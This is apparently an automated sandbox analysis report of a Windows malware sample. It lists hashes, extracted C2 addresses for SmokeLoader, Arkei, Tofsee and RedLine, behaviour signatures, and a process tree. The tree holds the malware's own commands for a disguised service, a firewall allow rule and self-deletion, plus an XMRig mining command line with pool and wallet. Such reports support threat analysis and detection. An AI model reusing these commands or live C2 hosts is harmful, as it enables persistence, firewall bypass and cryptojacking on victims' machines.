Analysis

  • max time kernel
    151s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    15/01/2022, 11:19

General

  • Target

    e4cfd91e111ae70cae6a95b899798f31a15faf333f155bc98ca1b7d668894a2f.exe

  • Size

    313KB

  • MD5

    40fb1ef2211bc5b1e0330c2eb5236fa0

  • SHA1

    c74d7625f4cd4320606cd5745207bb26b0fbee3f

  • SHA256

    e4cfd91e111ae70cae6a95b899798f31a15faf333f155bc98ca1b7d668894a2f

  • SHA512

    cb88f0455e3e85175fbd00f644be15eee0d9fa19e32ffd7b6e592a531ad922400e6fa3898583093252a9ee06f3de15eeb2351eec44a44000bf797739384862ca

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://host-data-coin-11.com/

http://file-coin-host-12.com/

http://srtuiyhuali.at/

http://fufuiloirtu.com/

http://amogohuigotuli.at/

http://novohudosovu.com/

http://brutuilionust.com/

http://bubushkalioua.com/

http://dumuilistrati.at/

http://verboliatsiaeeees.com/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

arkei

Botnet

Default

C2

http://file-file-host4.com/tratata.php

Extracted

Family

tofsee

C2

patmushta.info

parubey.info

Extracted

Family

redline

Botnet

noname

C2

185.215.113.29:34865

Signatures

  • Arkei

    Arkei is an infostealer written in C++.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

    suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

  • suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)

    suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Arkei Stealer Payload 3 IoCs
  • XMRig Miner Payload 3 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 12 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Deletes itself 1 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies data under HKEY_USERS 11 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e4cfd91e111ae70cae6a95b899798f31a15faf333f155bc98ca1b7d668894a2f.exe
    "C:\Users\Admin\AppData\Local\Temp\e4cfd91e111ae70cae6a95b899798f31a15faf333f155bc98ca1b7d668894a2f.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3992
    • C:\Users\Admin\AppData\Local\Temp\e4cfd91e111ae70cae6a95b899798f31a15faf333f155bc98ca1b7d668894a2f.exe
      "C:\Users\Admin\AppData\Local\Temp\e4cfd91e111ae70cae6a95b899798f31a15faf333f155bc98ca1b7d668894a2f.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:4056
  • C:\Users\Admin\AppData\Local\Temp\851A.exe
    C:\Users\Admin\AppData\Local\Temp\851A.exe
    1⤵
    • Executes dropped EXE
    • Checks SCSI registry key(s)
    • Suspicious behavior: MapViewOfSection
    PID:1088
  • C:\Users\Admin\AppData\Local\Temp\8BB3.exe
    C:\Users\Admin\AppData\Local\Temp\8BB3.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Checks processor information in registry
    • Suspicious use of WriteProcessMemory
    PID:3580
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\8BB3.exe" & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3048
      • C:\Windows\SysWOW64\timeout.exe
        timeout /t 5
        3⤵
        • Delays execution with timeout.exe
        PID:3124
  • C:\Users\Admin\AppData\Local\Temp\9038.exe
    C:\Users\Admin\AppData\Local\Temp\9038.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:1428
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\aoplruox\
      2⤵
        PID:596
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\fmhydiub.exe" C:\Windows\SysWOW64\aoplruox\
        2⤵
          PID:1572
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create aoplruox binPath= "C:\Windows\SysWOW64\aoplruox\fmhydiub.exe /d\"C:\Users\Admin\AppData\Local\Temp\9038.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:1756
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description aoplruox "wifi internet conection"
            2⤵
              PID:1016
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start aoplruox
              2⤵
                PID:956
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:1072
              • C:\Users\Admin\AppData\Local\Temp\921D.exe
                C:\Users\Admin\AppData\Local\Temp\921D.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2944
                • C:\Users\Admin\AppData\Local\Temp\921D.exe
                  C:\Users\Admin\AppData\Local\Temp\921D.exe
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2608
                  • C:\Users\Admin\AppData\Local\Temp\ferrari2.exe
                    "C:\Users\Admin\AppData\Local\Temp\ferrari2.exe"
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3920
              • C:\Windows\SysWOW64\aoplruox\fmhydiub.exe
                C:\Windows\SysWOW64\aoplruox\fmhydiub.exe /d"C:\Users\Admin\AppData\Local\Temp\9038.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:3772
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:3776
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2688
              • C:\Users\Admin\AppData\Local\Temp\F8A8.exe
                C:\Users\Admin\AppData\Local\Temp\F8A8.exe
                1⤵
                • Executes dropped EXE
                PID:2044
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 900
                  2⤵
                  • Suspicious use of NtCreateProcessExOtherParentProcess
                  • Program crash
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2100
              • C:\Users\Admin\AppData\Local\Temp\FC33.exe
                C:\Users\Admin\AppData\Local\Temp\FC33.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                PID:680
              • C:\Windows\SysWOW64\explorer.exe
                C:\Windows\SysWOW64\explorer.exe
                1⤵
                • Accesses Microsoft Outlook profiles
                • outlook_office_path
                • outlook_win_path
                PID:720
              • C:\Users\Admin\AppData\Local\Temp\1B3.exe
                C:\Users\Admin\AppData\Local\Temp\1B3.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:960
              • C:\Windows\explorer.exe
                C:\Windows\explorer.exe
                1⤵
                  PID:872
                • C:\Users\Admin\AppData\Local\Temp\1655.exe
                  C:\Users\Admin\AppData\Local\Temp\1655.exe
                  1⤵
                  • Executes dropped EXE
                  PID:2016
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 400
                    2⤵
                    • Program crash
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2096
                • C:\Users\Admin\AppData\Local\Temp\1ED2.exe
                  C:\Users\Admin\AppData\Local\Temp\1ED2.exe
                  1⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1248

                Network

                      MITRE ATT&CK Enterprise v6

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • memory/680-242-0x0000000005400000-0x0000000005401000-memory.dmp

                        Filesize

                        4KB

                      • memory/680-219-0x0000000000A90000-0x0000000000B13000-memory.dmp

                        Filesize

                        524KB

                      • memory/680-249-0x0000000071710000-0x000000007175B000-memory.dmp

                        Filesize

                        300KB

                      • memory/680-218-0x0000000000A90000-0x0000000000B13000-memory.dmp

                        Filesize

                        524KB

                      • memory/680-228-0x0000000005350000-0x0000000005362000-memory.dmp

                        Filesize

                        72KB

                      • memory/680-220-0x0000000000DD0000-0x0000000000DD1000-memory.dmp

                        Filesize

                        4KB

                      • memory/680-221-0x0000000076480000-0x0000000076642000-memory.dmp

                        Filesize

                        1.8MB

                      • memory/680-222-0x0000000073EA0000-0x0000000073F91000-memory.dmp

                        Filesize

                        964KB

                      • memory/680-232-0x00000000053B0000-0x00000000053EE000-memory.dmp

                        Filesize

                        248KB

                      • memory/680-237-0x0000000074B30000-0x0000000075E78000-memory.dmp

                        Filesize

                        19.3MB

                      • memory/680-223-0x0000000000A90000-0x0000000000B13000-memory.dmp

                        Filesize

                        524KB

                      • memory/680-224-0x00000000028F0000-0x0000000002935000-memory.dmp

                        Filesize

                        276KB

                      • memory/680-236-0x00000000766E0000-0x0000000076C64000-memory.dmp

                        Filesize

                        5.5MB

                      • memory/680-225-0x0000000000A90000-0x0000000000B13000-memory.dmp

                        Filesize

                        524KB

                      • memory/680-227-0x0000000005A20000-0x0000000006026000-memory.dmp

                        Filesize

                        6.0MB

                      • memory/680-226-0x0000000073610000-0x0000000073690000-memory.dmp

                        Filesize

                        512KB

                      • memory/680-229-0x0000000005520000-0x000000000562A000-memory.dmp

                        Filesize

                        1.0MB

                      • memory/720-243-0x0000000003470000-0x00000000034E4000-memory.dmp

                        Filesize

                        464KB

                      • memory/720-246-0x0000000003400000-0x000000000346B000-memory.dmp

                        Filesize

                        428KB

                      • memory/872-244-0x0000000000410000-0x0000000000417000-memory.dmp

                        Filesize

                        28KB

                      • memory/872-245-0x0000000000400000-0x000000000040C000-memory.dmp

                        Filesize

                        48KB

                      • memory/960-247-0x00000000007D9000-0x0000000000805000-memory.dmp

                        Filesize

                        176KB

                      • memory/1088-127-0x0000000000460000-0x000000000050E000-memory.dmp

                        Filesize

                        696KB

                      • memory/1088-128-0x0000000000400000-0x0000000000452000-memory.dmp

                        Filesize

                        328KB

                      • memory/1088-126-0x0000000000460000-0x000000000050E000-memory.dmp

                        Filesize

                        696KB

                      • memory/1428-140-0x0000000000400000-0x000000000055E000-memory.dmp

                        Filesize

                        1.4MB

                      • memory/1428-136-0x00000000007F9000-0x0000000000809000-memory.dmp

                        Filesize

                        64KB

                      • memory/1428-139-0x00000000006A0000-0x00000000007EA000-memory.dmp

                        Filesize

                        1.3MB

                      • memory/2044-240-0x0000000000400000-0x0000000002BC5000-memory.dmp

                        Filesize

                        39.8MB

                      • memory/2044-292-0x0000000000400000-0x0000000002BC5000-memory.dmp

                        Filesize

                        39.8MB

                      • memory/2044-239-0x0000000002F90000-0x0000000003050000-memory.dmp

                        Filesize

                        768KB

                      • memory/2044-238-0x0000000002EF0000-0x0000000002F90000-memory.dmp

                        Filesize

                        640KB

                      • memory/2044-250-0x0000000002E52000-0x0000000002ED3000-memory.dmp

                        Filesize

                        516KB

                      • memory/2044-266-0x0000000000400000-0x0000000002BC5000-memory.dmp

                        Filesize

                        39.8MB

                      • memory/2044-280-0x0000000000400000-0x0000000002BC5000-memory.dmp

                        Filesize

                        39.8MB

                      • memory/2164-119-0x0000000000980000-0x0000000000996000-memory.dmp

                        Filesize

                        88KB

                      • memory/2164-153-0x0000000002AE0000-0x0000000002AF6000-memory.dmp

                        Filesize

                        88KB

                      • memory/2608-164-0x0000000000400000-0x0000000000420000-memory.dmp

                        Filesize

                        128KB

                      • memory/2608-173-0x0000000004F40000-0x0000000004F7E000-memory.dmp

                        Filesize

                        248KB

                      • memory/2608-174-0x0000000004E30000-0x0000000005436000-memory.dmp

                        Filesize

                        6.0MB

                      • memory/2608-182-0x00000000052B0000-0x0000000005326000-memory.dmp

                        Filesize

                        472KB

                      • memory/2608-183-0x0000000005A50000-0x0000000005AE2000-memory.dmp

                        Filesize

                        584KB

                      • memory/2608-187-0x0000000007060000-0x000000000758C000-memory.dmp

                        Filesize

                        5.2MB

                      • memory/2608-184-0x00000000053F0000-0x000000000540E000-memory.dmp

                        Filesize

                        120KB

                      • memory/2608-186-0x0000000006960000-0x0000000006B22000-memory.dmp

                        Filesize

                        1.8MB

                      • memory/2608-175-0x0000000004FC0000-0x000000000500B000-memory.dmp

                        Filesize

                        300KB

                      • memory/2608-172-0x0000000005010000-0x000000000511A000-memory.dmp

                        Filesize

                        1.0MB

                      • memory/2608-168-0x0000000000400000-0x0000000000420000-memory.dmp

                        Filesize

                        128KB

                      • memory/2608-169-0x0000000000400000-0x0000000000420000-memory.dmp

                        Filesize

                        128KB

                      • memory/2608-185-0x0000000005E80000-0x0000000005EE6000-memory.dmp

                        Filesize

                        408KB

                      • memory/2608-181-0x0000000005F50000-0x000000000644E000-memory.dmp

                        Filesize

                        5.0MB

                      • memory/2608-170-0x0000000005440000-0x0000000005A46000-memory.dmp

                        Filesize

                        6.0MB

                      • memory/2608-171-0x0000000004EE0000-0x0000000004EF2000-memory.dmp

                        Filesize

                        72KB

                      • memory/2688-196-0x00000000006F0000-0x00000000007E1000-memory.dmp

                        Filesize

                        964KB

                      • memory/2688-191-0x00000000006F0000-0x00000000007E1000-memory.dmp

                        Filesize

                        964KB

                      • memory/2944-146-0x00000000054A0000-0x0000000005516000-memory.dmp

                        Filesize

                        472KB

                      • memory/2944-141-0x0000000000AF0000-0x0000000000B7A000-memory.dmp

                        Filesize

                        552KB

                      • memory/2944-148-0x0000000005480000-0x000000000549E000-memory.dmp

                        Filesize

                        120KB

                      • memory/2944-144-0x0000000005580000-0x0000000005581000-memory.dmp

                        Filesize

                        4KB

                      • memory/2944-145-0x0000000005400000-0x0000000005401000-memory.dmp

                        Filesize

                        4KB

                      • memory/2944-151-0x0000000005AB0000-0x0000000005FAE000-memory.dmp

                        Filesize

                        5.0MB

                      • memory/2944-142-0x0000000000AF0000-0x0000000000B7A000-memory.dmp

                        Filesize

                        552KB

                      • memory/3580-134-0x0000000000400000-0x000000000055F000-memory.dmp

                        Filesize

                        1.4MB

                      • memory/3580-133-0x0000000000640000-0x000000000065C000-memory.dmp

                        Filesize

                        112KB

                      • memory/3580-129-0x0000000000889000-0x000000000089A000-memory.dmp

                        Filesize

                        68KB

                      • memory/3772-162-0x00000000001E0000-0x00000000001F3000-memory.dmp

                        Filesize

                        76KB

                      • memory/3772-163-0x0000000000400000-0x000000000055E000-memory.dmp

                        Filesize

                        1.4MB

                      • memory/3772-157-0x0000000000714000-0x0000000000725000-memory.dmp

                        Filesize

                        68KB

                      • memory/3776-161-0x0000000000720000-0x0000000000721000-memory.dmp

                        Filesize

                        4KB

                      • memory/3776-158-0x0000000000A10000-0x0000000000A25000-memory.dmp

                        Filesize

                        84KB

                      • memory/3776-160-0x0000000000720000-0x0000000000721000-memory.dmp

                        Filesize

                        4KB

                      • memory/3920-231-0x0000000005B40000-0x0000000005BA6000-memory.dmp

                        Filesize

                        408KB

                      • memory/3920-211-0x0000000004CF4000-0x0000000004CF6000-memory.dmp

                        Filesize

                        8KB

                      • memory/3920-204-0x0000000005850000-0x000000000588E000-memory.dmp

                        Filesize

                        248KB

                      • memory/3920-208-0x0000000004CF0000-0x0000000004CF1000-memory.dmp

                        Filesize

                        4KB

                      • memory/3920-209-0x0000000004CF2000-0x0000000004CF3000-memory.dmp

                        Filesize

                        4KB

                      • memory/3920-206-0x00000000020C0000-0x00000000020F9000-memory.dmp

                        Filesize

                        228KB

                      • memory/3920-207-0x0000000000400000-0x0000000000579000-memory.dmp

                        Filesize

                        1.5MB

                      • memory/3920-203-0x0000000004BE0000-0x0000000004CEA000-memory.dmp

                        Filesize

                        1.0MB

                      • memory/3920-202-0x0000000004BB0000-0x0000000004BC2000-memory.dmp

                        Filesize

                        72KB

                      • memory/3920-201-0x0000000005200000-0x0000000005806000-memory.dmp

                        Filesize

                        6.0MB

                      • memory/3920-200-0x00000000026B0000-0x00000000026E2000-memory.dmp

                        Filesize

                        200KB

                      • memory/3920-210-0x0000000004CF3000-0x0000000004CF4000-memory.dmp

                        Filesize

                        4KB

                      • memory/3920-205-0x00000000058A0000-0x00000000058EB000-memory.dmp

                        Filesize

                        300KB

                      • memory/3920-199-0x0000000004D00000-0x00000000051FE000-memory.dmp

                        Filesize

                        5.0MB

                      • memory/3920-198-0x0000000002510000-0x0000000002544000-memory.dmp

                        Filesize

                        208KB

                      • memory/3992-116-0x00000000001E0000-0x00000000001E9000-memory.dmp

                        Filesize

                        36KB

                      • memory/4056-117-0x0000000000400000-0x0000000000409000-memory.dmp

                        Filesize

                        36KB